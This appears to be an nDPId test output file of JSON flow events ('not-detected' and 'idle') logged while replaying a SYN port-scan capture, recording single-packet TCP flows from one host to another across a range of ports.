+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1660,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1028,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1660,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1028,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":864,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1029,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":864,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1029,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3077,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3077,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1186,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060291,"flow_last_seen":1278275060291,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1030,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1186,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060291,"flow_last_seen":1278275060291,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":941,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1029,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":941,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1029,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3077,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3077,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1270,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1030,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1270,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":636,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059516,"flow_last_seen":1278275059516,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1031,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":636,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059516,"flow_last_seen":1278275059516,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1031,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1198,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1032,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1198,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1032,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":701,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1031,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":701,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1031,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1493,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1033,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1493,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1033,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1274,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060395,"flow_last_seen":1278275060395,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1032,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1274,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060395,"flow_last_seen":1278275060395,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1032,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1556,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1033,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1556,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1033,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1546,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1034,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1546,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1034,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1607,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1034,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1607,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1034,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1329,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060492,"flow_last_seen":1278275060492,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1035,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1329,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060492,"flow_last_seen":1278275060492,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1035,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1416,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1035,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1416,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1035,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":581,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1036,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":581,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1036,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1028,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060067,"flow_last_seen":1278275060067,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1037,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1028,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060067,"flow_last_seen":1278275060067,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1037,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":639,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059517,"flow_last_seen":1278275059517,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1036,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":639,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059517,"flow_last_seen":1278275059517,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1036,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1821,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1038,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1821,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1038,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1077,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1037,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1077,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1037,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1885,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061256,"flow_last_seen":1278275061256,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1038,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1885,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061256,"flow_last_seen":1278275061256,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1038,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1538,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1039,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 